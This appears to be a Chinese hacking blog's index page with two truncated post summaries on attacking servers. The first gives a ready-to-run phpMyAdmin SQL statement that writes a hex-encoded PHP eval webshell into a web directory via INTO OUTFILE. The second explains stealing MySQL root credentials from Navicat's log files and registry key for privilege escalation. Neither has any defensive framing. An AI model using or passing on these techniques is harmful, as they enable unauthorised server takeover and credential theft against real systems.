天黑再动手

摘要： 在网上看到的都是先建立一个表。然后插入一句话木马。再查询并导出，经过我实验 其实不用建表 就可以导出文件的比如我们进入了phpmyadmin，随便点击一个数据库，然后点击sql,接着执行select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'd:/xamp/www/ok.php'即可将一句话<?php eval($_REQUEST[cmd]);?>导出得到webshell.遇到php+mysql注入点的时候 如果权限允许并且php.ini里面magic_quo 阅读全文

摘要： navicat是一个比较流行的MySQL管理工具，在很多服务器上都可以找到有两个方法提权：1、从日志文件里找密码，navicat会把操作日志（比如加账户）保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt，低版本是安装目录下的logs下LogHistory.txt2、navicat管理的MySQL服务器信息（一般是root帐户）是存在注册表里的，具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下，导出注册表导入到本机然后星号察看就OK了 阅读全文